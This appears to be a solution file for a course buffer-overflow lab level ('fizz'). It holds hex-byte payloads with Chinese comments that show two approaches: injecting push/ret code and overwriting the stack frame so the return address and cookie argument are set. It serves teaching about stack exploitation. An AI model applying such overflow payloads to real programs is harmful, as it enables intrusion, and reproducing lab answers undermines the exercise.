/* userid == dogdu, cookie == 0x36bf12b0 */

/*
/* 方法一： 进行代码注入 */
68 b0 12 bf 36 /* 压入cookie两次是为了对齐地址，因为fizz中是 mov 0x8(%ebp), %eax 来获取参数 */
68 b0 12 bf 36
68 42 8c 04 08 /* 把fizz函数地址压入栈中 */
c3
61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61
61 61 61 61
61 61 61 61 38 38 68 55 /* 简单的代码注入 */
*/

/* 方法二： 覆盖栈帧
  因为x86-32是通过栈进行参数传递，而不是通过寄存器
  获取参数的方法是 mov 0x8(%ebp), %eax ，所以只要覆盖栈帧上面的8个字节即可
*/

61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61
61 61 61 61 61 61 61 61 61 61
61 61 61 61
42 8c 04 08 /* fizz函数的地址 */
b0 12 bf 36 b0 12 bf 36 /* cookie值，要倒序 */
